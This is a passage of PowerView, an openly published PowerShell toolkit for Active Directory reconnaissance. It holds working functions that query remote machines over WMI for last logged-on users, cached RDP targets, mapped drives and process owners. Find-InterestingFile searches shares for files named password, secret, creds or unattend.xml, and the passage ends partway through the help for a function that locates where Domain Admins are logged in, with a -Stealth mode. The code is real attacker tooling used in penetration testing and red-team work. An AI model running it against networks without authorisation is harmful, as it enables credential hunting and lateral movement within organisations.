'localhost'.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connecting to the remote system.\n\n.EXAMPLE\n\nGet-WMIRegLastLoggedOn\n\nReturns the last user logged onto the local machine.\n\n.EXAMPLE\n\nGet-WMIRegLastLoggedOn -ComputerName WINDOWS1\n\nReturns the last user logged onto WINDOWS1\n\n.EXAMPLE\n\nGet-DomainComputer | Get-WMIRegLastLoggedOn\n\nReturns the last user logged onto all machines in the domain.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-WMIRegLastLoggedOn -ComputerName PRIMARY.testlab.local -Credential $Cred\n\n.OUTPUTS\n\nPowerView.LastLoggedOnUser\n\nA PSCustomObject containing the ComputerName and last loggedon user.\n#>\n\n    [OutputType('PowerView.LastLoggedOnUser')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('HostName', 'dnshostname', 'name')]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $ComputerName = 'localhost',\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    PROCESS {\n        ForEach ($Computer in $ComputerName) {\n            # HKEY_LOCAL_MACHINE\n            $HKLM = 2147483650\n\n            $WmiArguments = @{\n                'List' = $True\n                'Class' = 'StdRegProv'\n                'Namespace' = 'root\\default'\n                'Computername' = $Computer\n                'ErrorAction' = 'SilentlyContinue'\n            }\n            if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential }\n\n            # try to open up the remote registry key to grab the last logged on user\n            try {\n                $Reg = Get-WmiObject @WmiArguments\n\n                $Key = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\LogonUI'\n                $Value = 'LastLoggedOnUser'\n                $LastUser = $Reg.GetStringValue($HKLM, $Key, $Value).sValue\n\n                $LastLoggedOn = New-Object PSObject\n                $LastLoggedOn | Add-Member Noteproperty 'ComputerName' $Computer\n                $LastLoggedOn | Add-Member Noteproperty 'LastLoggedOn' $LastUser\n                $LastLoggedOn.PSObject.TypeNames.Insert(0, 'PowerView.LastLoggedOnUser')\n                $LastLoggedOn\n            }\n            catch {\n                Write-Warning \"[Get-WMIRegLastLoggedOn] Error opening remote registry on $Computer. Remote registry likely not enabled.\"\n            }\n        }\n    }\n}\n\n\nfunction Get-WMIRegCachedRDPConnection {\n<#\n.SYNOPSIS\n\nReturns information about RDP connections outgoing from the local (or remote) machine.\n\nNote: This function requires administrative rights on the machine you're enumerating.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: ConvertFrom-SID  \n\n.DESCRIPTION\n\nUses remote registry functionality to query all entries for the\n\"Windows Remote Desktop Connection Client\" on a machine, separated by\nuser and target server.\n\n.PARAMETER ComputerName\n\nSpecifies the hostname to query for cached RDP connections (also accepts IP addresses).\nDefaults to 'localhost'.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connecting to the remote system.\n\n.EXAMPLE\n\nGet-WMIRegCachedRDPConnection\n\nReturns the RDP connection client information for the local machine.\n\n.EXAMPLE\n\nGet-WMIRegCachedRDPConnection  -ComputerName WINDOWS2.testlab.local\n\nReturns the RDP connection client information for the WINDOWS2.testlab.local machine\n\n.EXAMPLE\n\nGet-DomainComputer | Get-WMIRegCachedRDPConnection\n\nReturns cached RDP information for all machines in the domain.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-WMIRegCachedRDPConnection -ComputerName PRIMARY.testlab.local -Credential $Cred\n\n.OUTPUTS\n\nPowerView.CachedRDPConnection\n\nA PSCustomObject containing the ComputerName and cached RDP information.\n#>\n\n    [OutputType('PowerView.CachedRDPConnection')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('HostName', 'dnshostname', 'name')]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $ComputerName = 'localhost',\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    PROCESS {\n        ForEach ($Computer in $ComputerName) {\n            # HKEY_USERS\n            $HKU = 2147483651\n\n            $WmiArguments = @{\n                'List' = $True\n                'Class' = 'StdRegProv'\n                'Namespace' = 'root\\default'\n                'Computername' = $Computer\n                'ErrorAction' = 'Stop'\n            }\n            if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential }\n\n            try {\n                $Reg = Get-WmiObject @WmiArguments\n\n                # extract out the SIDs of domain users in this hive\n                $UserSIDs = ($Reg.EnumKey($HKU, '')).sNames | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' }\n\n                ForEach ($UserSID in $UserSIDs) {\n                    try {\n                        if ($PSBoundParameters['Credential']) {\n                            $UserName = ConvertFrom-SID -ObjectSid $UserSID -Credential $Credential\n                        }\n                        else {\n                            $UserName = ConvertFrom-SID -ObjectSid $UserSID\n                        }\n\n                        # pull out all the cached RDP connections\n                        $ConnectionKeys = $Reg.EnumValues($HKU,\"$UserSID\\Software\\Microsoft\\Terminal Server Client\\Default\").sNames\n\n                        ForEach ($Connection in $ConnectionKeys) {\n                            # make sure this key is a cached connection\n                            if ($Connection -match 'MRU.*') {\n                                $TargetServer = $Reg.GetStringValue($HKU, \"$UserSID\\Software\\Microsoft\\Terminal Server Client\\Default\", $Connection).sValue\n\n                                $FoundConnection = New-Object PSObject\n                                $FoundConnection | Add-Member Noteproperty 'ComputerName' $Computer\n                                $FoundConnection | Add-Member Noteproperty 'UserName' $UserName\n                                $FoundConnection | Add-Member Noteproperty 'UserSID' $UserSID\n                                $FoundConnection | Add-Member Noteproperty 'TargetServer' $TargetServer\n                                $FoundConnection | Add-Member Noteproperty 'UsernameHint' $Null\n                                $FoundConnection.PSObject.TypeNames.Insert(0, 'PowerView.CachedRDPConnection')\n                                $FoundConnection\n                            }\n                        }\n\n                        # pull out all the cached server info with username hints\n                        $ServerKeys = $Reg.EnumKey($HKU,\"$UserSID\\Software\\Microsoft\\Terminal Server Client\\Servers\").sNames\n\n                        ForEach ($Server in $ServerKeys) {\n\n                            $UsernameHint = $Reg.GetStringValue($HKU, \"$UserSID\\Software\\Microsoft\\Terminal Server Client\\Servers\\$Server\", 'UsernameHint').sValue\n\n                            $FoundConnection = New-Object PSObject\n                            $FoundConnection | Add-Member Noteproperty 'ComputerName' $Computer\n                            $FoundConnection | Add-Member Noteproperty 'UserName' $UserName\n                            $FoundConnection | Add-Member Noteproperty 'UserSID' $UserSID\n                            $FoundConnection | Add-Member Noteproperty 'TargetServer' $Server\n                            $FoundConnection | Add-Member Noteproperty 'UsernameHint' $UsernameHint\n                            $FoundConnection.PSObject.TypeNames.Insert(0, 'PowerView.CachedRDPConnection')\n                            $FoundConnection\n                        }\n                    }\n                    catch {\n                        Write-Verbose \"[Get-WMIRegCachedRDPConnection] Error: $_\"\n                    }\n                }\n            }\n            catch {\n                Write-Warning \"[Get-WMIRegCachedRDPConnection] Error accessing $Computer, likely insufficient permissions or firewall rules on host: $_\"\n            }\n        }\n    }\n}\n\n\nfunction Get-WMIRegMountedDrive {\n<#\n.SYNOPSIS\n\nReturns information about saved network mounted drives for the local (or remote) machine.\n\nNote: This function requires administrative rights on the machine you're enumerating.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: ConvertFrom-SID  \n\n.DESCRIPTION\n\nUses remote registry functionality to enumerate recently mounted network drives.\n\n.PARAMETER ComputerName\n\nSpecifies the hostname to query for mounted drive information (also accepts IP addresses).\nDefaults to 'localhost'.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connecting to the remote system.\n\n.EXAMPLE\n\nGet-WMIRegMountedDrive\n\nReturns the saved network mounted drives for the local machine.\n\n.EXAMPLE\n\nGet-WMIRegMountedDrive -ComputerName WINDOWS2.testlab.local\n\nReturns the saved network mounted drives for the WINDOWS2.testlab.local machine\n\n.EXAMPLE\n\nGet-DomainComputer | Get-WMIRegMountedDrive\n\nReturns the saved network mounted drives for all machines in the domain.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-WMIRegMountedDrive -ComputerName PRIMARY.testlab.local -Credential $Cred\n\n.OUTPUTS\n\nPowerView.RegMountedDrive\n\nA PSCustomObject containing the ComputerName and mounted drive information.\n#>\n\n    [OutputType('PowerView.RegMountedDrive')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('HostName', 'dnshostname', 'name')]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $ComputerName = 'localhost',\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    PROCESS {\n        ForEach ($Computer in $ComputerName) {\n            # HKEY_USERS\n            $HKU = 2147483651\n\n            $WmiArguments = @{\n                'List' = $True\n                'Class' = 'StdRegProv'\n                'Namespace' = 'root\\default'\n                'Computername' = $Computer\n                'ErrorAction' = 'Stop'\n            }\n            if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential }\n\n            try {\n                $Reg = Get-WmiObject @WmiArguments\n\n                # extract out the SIDs of domain users in this hive\n                $UserSIDs = ($Reg.EnumKey($HKU, '')).sNames | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' }\n\n                ForEach ($UserSID in $UserSIDs) {\n                    try {\n                        if ($PSBoundParameters['Credential']) {\n                            $UserName = ConvertFrom-SID -ObjectSid $UserSID -Credential $Credential\n                        }\n                        else {\n                            $UserName = ConvertFrom-SID -ObjectSid $UserSID\n                        }\n\n                        $DriveLetters = ($Reg.EnumKey($HKU, \"$UserSID\\Network\")).sNames\n\n                        ForEach ($DriveLetter in $DriveLetters) {\n                            $ProviderName = $Reg.GetStringValue($HKU, \"$UserSID\\Network\\$DriveLetter\", 'ProviderName').sValue\n                            $RemotePath = $Reg.GetStringValue($HKU, \"$UserSID\\Network\\$DriveLetter\", 'RemotePath').sValue\n                            $DriveUserName = $Reg.GetStringValue($HKU, \"$UserSID\\Network\\$DriveLetter\", 'UserName').sValue\n                            if (-not $UserName) { $UserName = '' }\n\n                            if ($RemotePath -and ($RemotePath -ne '')) {\n                                $MountedDrive = New-Object PSObject\n                                $MountedDrive | Add-Member Noteproperty 'ComputerName' $Computer\n                                $MountedDrive | Add-Member Noteproperty 'UserName' $UserName\n                                $MountedDrive | Add-Member Noteproperty 'UserSID' $UserSID\n                                $MountedDrive | Add-Member Noteproperty 'DriveLetter' $DriveLetter\n                                $MountedDrive | Add-Member Noteproperty 'ProviderName' $ProviderName\n                                $MountedDrive | Add-Member Noteproperty 'RemotePath' $RemotePath\n                                $MountedDrive | Add-Member Noteproperty 'DriveUserName' $DriveUserName\n                                $MountedDrive.PSObject.TypeNames.Insert(0, 'PowerView.RegMountedDrive')\n                                $MountedDrive\n                            }\n                        }\n                    }\n                    catch {\n                        Write-Verbose \"[Get-WMIRegMountedDrive] Error: $_\"\n                    }\n                }\n            }\n            catch {\n                Write-Warning \"[Get-WMIRegMountedDrive] Error accessing $Computer, likely insufficient permissions or firewall rules on host: $_\"\n            }\n        }\n    }\n}\n\n\nfunction Get-WMIProcess {\n<#\n.SYNOPSIS\n\nReturns a list of processes and their owners on the local or remote machine.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.DESCRIPTION\n\nUses Get-WMIObject to enumerate all Win32_process instances on the local or remote machine,\nincluding the owners of the particular process.\n\n.PARAMETER ComputerName\n\nSpecifies the hostname to query for cached RDP connections (also accepts IP addresses).\nDefaults to 'localhost'.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the remote system.\n\n.EXAMPLE\n\nGet-WMIProcess -ComputerName WINDOWS1\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-WMIProcess -ComputerName PRIMARY.testlab.local -Credential $Cred\n\n.OUTPUTS\n\nPowerView.UserProcess\n\nA PSCustomObject containing the remote process information.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.UserProcess')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('HostName', 'dnshostname', 'name')]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $ComputerName = 'localhost',\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    PROCESS {\n        ForEach ($Computer in $ComputerName) {\n            try {\n                $WmiArguments = @{\n                    'ComputerName' = $ComputerName\n                    'Class' = 'Win32_process'\n                }\n                if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential }\n                Get-WMIobject @WmiArguments | ForEach-Object {\n                    $Owner = $_.getowner();\n                    $Process = New-Object PSObject\n                    $Process | Add-Member Noteproperty 'ComputerName' $Computer\n                    $Process | Add-Member Noteproperty 'ProcessName' $_.ProcessName\n                    $Process | Add-Member Noteproperty 'ProcessID' $_.ProcessID\n                    $Process | Add-Member Noteproperty 'Domain' $Owner.Domain\n                    $Process | Add-Member Noteproperty 'User' $Owner.User\n                    $Process.PSObject.TypeNames.Insert(0, 'PowerView.UserProcess')\n                    $Process\n                }\n            }\n            catch {\n                Write-Verbose \"[Get-WMIProcess] Error enumerating remote processes on '$Computer', access likely denied: $_\"\n            }\n        }\n    }\n}\n\n\nfunction Find-InterestingFile {\n<#\n.SYNOPSIS\n\nSearches for files on the given path that match a series of specified criteria.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Add-RemoteConnection, Remove-RemoteConnection  \n\n.DESCRIPTION\n\nThis function recursively searches a given UNC path for files with\nspecific keywords in the name (default of pass, sensitive, secret, admin,\nlogin and unattend*.xml). By default, hidden files/folders are included\nin search results. If -Credential is passed, Add-RemoteConnection/Remove-RemoteConnection\nis used to temporarily map the remote share.\n\n.PARAMETER Path\n\nUNC/local path to recursively search.\n\n.PARAMETER Include\n\nOnly return files/folders that match the specified array of strings,\ni.e. @(*.doc*, *.xls*, *.ppt*)\n\n.PARAMETER LastAccessTime\n\nOnly return files with a LastAccessTime greater than this date value.\n\n.PARAMETER LastWriteTime\n\nOnly return files with a LastWriteTime greater than this date value.\n\n.PARAMETER CreationTime\n\nOnly return files with a CreationTime greater than this date value.\n\n.PARAMETER OfficeDocs\n\nSwitch. Search for office documents (*.doc*, *.xls*, *.ppt*)\n\n.PARAMETER FreshEXEs\n\nSwitch. Find .EXEs accessed within the last 7 days.\n\n.PARAMETER ExcludeFolders\n\nSwitch. Exclude folders from the search results.\n\n.PARAMETER ExcludeHidden\n\nSwitch. Exclude hidden files and folders from the search results.\n\n.PARAMETER CheckWriteAccess\n\nSwitch. Only returns files the current user has write access to.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nto connect to remote systems for file enumeration.\n\n.EXAMPLE\n\nFind-InterestingFile -Path \"C:\\Backup\\\"\n\nReturns any files on the local path C:\\Backup\\ that have the default\nsearch term set in the title.\n\n.EXAMPLE\n\nFind-InterestingFile -Path \"\\\\WINDOWS7\\Users\\\" -LastAccessTime (Get-Date).AddDays(-7)\n\nReturns any files on the remote path \\\\WINDOWS7\\Users\\ that have the default\nsearch term set in the title and were accessed within the last week.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nFind-InterestingFile -Credential $Cred -Path \"\\\\PRIMARY.testlab.local\\C$\\Temp\\\"\n\n.OUTPUTS\n\nPowerView.FoundFile\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.FoundFile')]\n    [CmdletBinding(DefaultParameterSetName = 'FileSpecification')]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $Path = '.\\',\n\n        [Parameter(ParameterSetName = 'FileSpecification')]\n        [ValidateNotNullOrEmpty()]\n        [Alias('SearchTerms', 'Terms')]\n        [String[]]\n        $Include = @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config'),\n\n        [Parameter(ParameterSetName = 'FileSpecification')]\n        [ValidateNotNullOrEmpty()]\n        [DateTime]\n        $LastAccessTime,\n\n        [Parameter(ParameterSetName = 'FileSpecification')]\n        [ValidateNotNullOrEmpty()]\n        [DateTime]\n        $LastWriteTime,\n\n        [Parameter(ParameterSetName = 'FileSpecification')]\n        [ValidateNotNullOrEmpty()]\n        [DateTime]\n        $CreationTime,\n\n        [Parameter(ParameterSetName = 'OfficeDocs')]\n        [Switch]\n        $OfficeDocs,\n\n        [Parameter(ParameterSetName = 'FreshEXEs')]\n        [Switch]\n        $FreshEXEs,\n\n        [Parameter(ParameterSetName = 'FileSpecification')]\n        [Switch]\n        $ExcludeFolders,\n\n        [Parameter(ParameterSetName = 'FileSpecification')]\n        [Switch]\n        $ExcludeHidden,\n\n        [Switch]\n        $CheckWriteAccess,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        $SearcherArguments =  @{\n            'Recurse' = $True\n            'ErrorAction' = 'SilentlyContinue'\n            'Include' = $Include\n        }\n        if ($PSBoundParameters['OfficeDocs']) {\n            $SearcherArguments['Include'] = @('*.doc', '*.docx', '*.xls', '*.xlsx', '*.ppt', '*.pptx')\n        }\n        elseif ($PSBoundParameters['FreshEXEs']) {\n            # find .exe's accessed within the last 7 days\n            $LastAccessTime = (Get-Date).AddDays(-7).ToString('MM/dd/yyyy')\n            $SearcherArguments['Include'] = @('*.exe')\n        }\n        $SearcherArguments['Force'] = -not $PSBoundParameters['ExcludeHidden']\n\n        $MappedComputers = @{}\n\n        function Test-Write {\n            # short helper to check is the current user can write to a file\n            [CmdletBinding()]Param([String]$Path)\n            try {\n                $Filetest = [IO.File]::OpenWrite($Path)\n                $Filetest.Close()\n                $True\n            }\n            catch {\n                $False\n            }\n        }\n    }\n\n    PROCESS {\n        ForEach ($TargetPath in $Path) {\n            if (($TargetPath -Match '\\\\\\\\.*\\\\.*') -and ($PSBoundParameters['Credential'])) {\n                $HostComputer = (New-Object System.Uri($TargetPath)).Host\n                if (-not $MappedComputers[$HostComputer]) {\n                    # map IPC$ to this computer if it's not already\n                    Add-RemoteConnection -ComputerName $HostComputer -Credential $Credential\n                    $MappedComputers[$HostComputer] = $True\n                }\n            }\n\n            $SearcherArguments['Path'] = $TargetPath\n            Get-ChildItem @SearcherArguments | ForEach-Object {\n                # check if we're excluding folders\n                $Continue = $True\n                if ($PSBoundParameters['ExcludeFolders'] -and ($_.PSIsContainer)) {\n                    Write-Verbose \"Excluding: $($_.FullName)\"\n                    $Continue = $False\n                }\n                if ($LastAccessTime -and ($_.LastAccessTime -lt $LastAccessTime)) {\n                    $Continue = $False\n                }\n                if ($PSBoundParameters['LastWriteTime'] -and ($_.LastWriteTime -lt $LastWriteTime)) {\n                    $Continue = $False\n                }\n                if ($PSBoundParameters['CreationTime'] -and ($_.CreationTime -lt $CreationTime)) {\n                    $Continue = $False\n                }\n                if ($PSBoundParameters['CheckWriteAccess'] -and (-not (Test-Write -Path $_.FullName))) {\n                    $Continue = $False\n                }\n                if ($Continue) {\n                    $FileParams = @{\n                        'Path' = $_.FullName\n                        'Owner' = $((Get-Acl $_.FullName).Owner)\n                        'LastAccessTime' = $_.LastAccessTime\n                        'LastWriteTime' = $_.LastWriteTime\n                        'CreationTime' = $_.CreationTime\n                        'Length' = $_.Length\n                    }\n                    $FoundFile = New-Object -TypeName PSObject -Property $FileParams\n                    $FoundFile.PSObject.TypeNames.Insert(0, 'PowerView.FoundFile')\n                    $FoundFile\n                }\n            }\n        }\n    }\n\n    END {\n        # remove the IPC$ mappings\n        $MappedComputers.Keys | Remove-RemoteConnection\n    }\n}\n\n\n########################################################\n#\n# 'Meta'-functions start below\n#\n########################################################\n\nfunction New-ThreadedFunction {\n    # Helper used by any threaded host enumeration functions\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [String[]]\n        $ComputerName,\n\n        [Parameter(Position = 1, Mandatory = $True)]\n        [System.Management.Automation.ScriptBlock]\n        $ScriptBlock,\n\n        [Parameter(Position = 2)]\n        [Hashtable]\n        $ScriptParameters,\n\n        [Int]\n        [ValidateRange(1,  100)]\n        $Threads = 20,\n\n        [Switch]\n        $NoImports\n    )\n\n    BEGIN {\n        # Adapted from:\n        #   http://powershell.org/wp/forums/topic/invpke-parallel-need-help-to-clone-the-current-runspace/\n        $SessionState = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()\n\n        # # $SessionState.ApartmentState = [System.Threading.Thread]::CurrentThread.GetApartmentState()\n        # force a single-threaded apartment state (for token-impersonation stuffz)\n        $SessionState.ApartmentState = [System.Threading.ApartmentState]::STA\n\n        # import the current session state's variables and functions so the chained PowerView\n        #   functionality can be used by the threaded blocks\n        if (-not $NoImports) {\n            # grab all the current variables for this runspace\n            $MyVars = Get-Variable -Scope 2\n\n            # these Variables are added by Runspace.Open() Method and produce Stop errors if you add them twice\n            $VorbiddenVars = @('?','args','ConsoleFileName','Error','ExecutionContext','false','HOME','Host','input','InputObject','MaximumAliasCount','MaximumDriveCount','MaximumErrorCount','MaximumFunctionCount','MaximumHistoryCount','MaximumVariableCount','MyInvocation','null','PID','PSBoundParameters','PSCommandPath','PSCulture','PSDefaultParameterValues','PSHOME','PSScriptRoot','PSUICulture','PSVersionTable','PWD','ShellId','SynchronizedHash','true')\n\n            # add Variables from Parent Scope (current runspace) into the InitialSessionState\n            ForEach ($Var in $MyVars) {\n                if ($VorbiddenVars -NotContains $Var.Name) {\n                $SessionState.Variables.Add((New-Object -TypeName System.Management.Automation.Runspaces.SessionStateVariableEntry -ArgumentList $Var.name,$Var.Value,$Var.description,$Var.options,$Var.attributes))\n                }\n            }\n\n            # add Functions from current runspace to the InitialSessionState\n            ForEach ($Function in (Get-ChildItem Function:)) {\n                $SessionState.Commands.Add((New-Object -TypeName System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList $Function.Name, $Function.Definition))\n            }\n        }\n\n        # threading adapted from\n        # https://github.com/darkoperator/Posh-SecMod/blob/master/Discovery/Discovery.psm1#L407\n        #   Thanks Carlos!\n\n        # create a pool of maxThread runspaces\n        $Pool = [RunspaceFactory]::CreateRunspacePool(1, $Threads, $SessionState, $Host)\n        $Pool.Open()\n\n        # do some trickery to get the proper BeginInvoke() method that allows for an output queue\n        $Method = $Null\n        ForEach ($M in [PowerShell].GetMethods() | Where-Object { $_.Name -eq 'BeginInvoke' }) {\n            $MethodParameters = $M.GetParameters()\n            if (($MethodParameters.Count -eq 2) -and $MethodParameters[0].Name -eq 'input' -and $MethodParameters[1].Name -eq 'output') {\n                $Method = $M.MakeGenericMethod([Object], [Object])\n                break\n            }\n        }\n\n        $Jobs = @()\n        $ComputerName = $ComputerName | Where-Object {$_ -and $_.Trim()}\n        Write-Verbose \"[New-ThreadedFunction] Total number of hosts: $($ComputerName.count)\"\n\n        # partition all hosts from -ComputerName into $Threads number of groups\n        if ($Threads -ge $ComputerName.Length) {\n            $Threads = $ComputerName.Length\n        }\n        $ElementSplitSize = [Int]($ComputerName.Length/$Threads)\n        $ComputerNamePartitioned = @()\n        $Start = 0\n        $End = $ElementSplitSize\n\n        for($i = 1; $i -le $Threads; $i++) {\n            $List = New-Object System.Collections.ArrayList\n            if ($i -eq $Threads) {\n                $End = $ComputerName.Length\n            }\n            $List.AddRange($ComputerName[$Start..($End-1)])\n            $Start += $ElementSplitSize\n            $End += $ElementSplitSize\n            $ComputerNamePartitioned += @(,@($List.ToArray()))\n        }\n\n        Write-Verbose \"[New-ThreadedFunction] Total number of threads/partitions: $Threads\"\n\n        ForEach ($ComputerNamePartition in $ComputerNamePartitioned) {\n            # create a \"powershell pipeline runner\"\n            $PowerShell = [PowerShell]::Create()\n            $PowerShell.runspacepool = $Pool\n\n            # add the script block + arguments with the given computer partition\n            $Null = $PowerShell.AddScript($ScriptBlock).AddParameter('ComputerName', $ComputerNamePartition)\n            if ($ScriptParameters) {\n                ForEach ($Param in $ScriptParameters.GetEnumerator()) {\n                    $Null = $PowerShell.AddParameter($Param.Name, $Param.Value)\n                }\n            }\n\n            # create the output queue\n            $Output = New-Object Management.Automation.PSDataCollection[Object]\n\n            # kick off execution using the BeginInvok() method that allows queues\n            $Jobs += @{\n                PS = $PowerShell\n                Output = $Output\n                Result = $Method.Invoke($PowerShell, @($Null, [Management.Automation.PSDataCollection[Object]]$Output))\n            }\n        }\n    }\n\n    END {\n        Write-Verbose \"[New-ThreadedFunction] Threads executing\"\n\n        # continuously loop through each job queue, consuming output as appropriate\n        Do {\n            ForEach ($Job in $Jobs) {\n                $Job.Output.ReadAll()\n            }\n            Start-Sleep -Seconds 1\n        }\n        While (($Jobs | Where-Object { -not $_.Result.IsCompleted }).Count -gt 0)\n\n        $SleepSeconds = 100\n        Write-Verbose \"[New-ThreadedFunction] Waiting $SleepSeconds seconds for final cleanup...\"\n\n        # cleanup- make sure we didn't miss anything\n        for ($i=0; $i -lt $SleepSeconds; $i++) {\n            ForEach ($Job in $Jobs) {\n                $Job.Output.ReadAll()\n                $Job.PS.Dispose()\n            }\n            Start-Sleep -S 1\n        }\n\n        $Pool.Dispose()\n        Write-Verbose \"[New-ThreadedFunction] all threads completed\"\n    }\n}\n\n\nfunction Find-DomainUserLocation {\n<#\n.SYNOPSIS\n\nFinds domain machines where specific users are logged into.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainFileServer, Get-DomainDFSShare, Get-DomainController, Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetSession, Test-AdminAccess, Get-NetLoggedon, Resolve-IPAddress, New-ThreadedFunction  \n\n.DESCRIPTION\n\nThis function enumerates all machines on the current (or specified) domain\nusing Get-DomainComputer, and queries the domain for users of a specified group\n(default 'Domain Admins') with Get-DomainGroupMember. Then for each server the\nfunction enumerates any active user sessions with Get-NetSession/Get-NetLoggedon\nThe found user list is compared against the target list, and any matches are\ndisplayed. If -ShowAll is specified, all results are displayed instead of\nthe filtered set. If -Stealth is specified, then likely highly-trafficed servers\nare enumerated with Get-DomainFileServer/Get-DomainController, and session\nenumeration is executed only against those servers. If -Credential is passed,\nthen Invoke-UserImpersonation is used to impersonate the specified user\nbefore enumeration, reverting after with Invoke-RevertToSelf.\n\n.PARAMETER ComputerName\n\nSpecifies an array of one or more hosts to enumerate, passable on the pipeline.\nIf -ComputerName is not passed, the default behavior is to enumerate all machines\nin the domain returned by Get-DomainComputer.\n\n.PARAMETER Domain\n\nSpecifies the domain to query for computers AND users, defaults to the current domain.\n\n.PARAMETER ComputerDomain\n\nSpecifies the domain to query for computers, defaults to the current domain.\n\n.PARAMETER ComputerLDAPFilter\n\nSpecifies an LDAP query string that is used to search for computer objects.\n\n.PARAMETER ComputerSearchBase\n\nSpecifies the LDAP source to search through for computers,\ne.g. \"LDAP://OU=secret,DC=testlab,DC=local\". Useful for OU queries.\n\n.PARAMETER ComputerUnconstrained\n\nSwitch. Search computer objects that have unconstrained delegation.\n\n.PARAMETER ComputerOperatingSystem\n\nSearch computers with a specific operating system, wildcards accepted.\n\n.PARAMETER ComputerServicePack\n\nSearch computers with a specific service pack, wildcards accepted.\n\n.PARAMETER ComputerSiteName\n\nSearch computers in the specific AD Site name, wildcards accepted.\n\n.PARAMETER UserIdentity\n\nSpecifies one or more user identities to search for.\n\n.PARAMETER UserDomain\n\nSpecifies the domain to query for users to search for, defaults to the current domain.\n\n.PARAMETER UserLDAPFilter\n\nSpecifies an LDAP query string that is used to search for target users.\n\n.PARAMETER UserSearchBase\n\nSpecifies the LDAP source to search through for target users.\ne.g. \"LDAP://OU=secret,DC=testlab,DC=local\". Useful for OU queries.\n\n.PARAMETER UserGroupIdentity\n\nSpecifies a group identity to query for target users, defaults to 'Domain Admins.\nIf any other user specifications are set, then UserGroupIdentity is ignored.\n\n.PARAMETER UserAdminCount\n\nSwitch. Search for users users with '(adminCount=1)' (meaning are/were 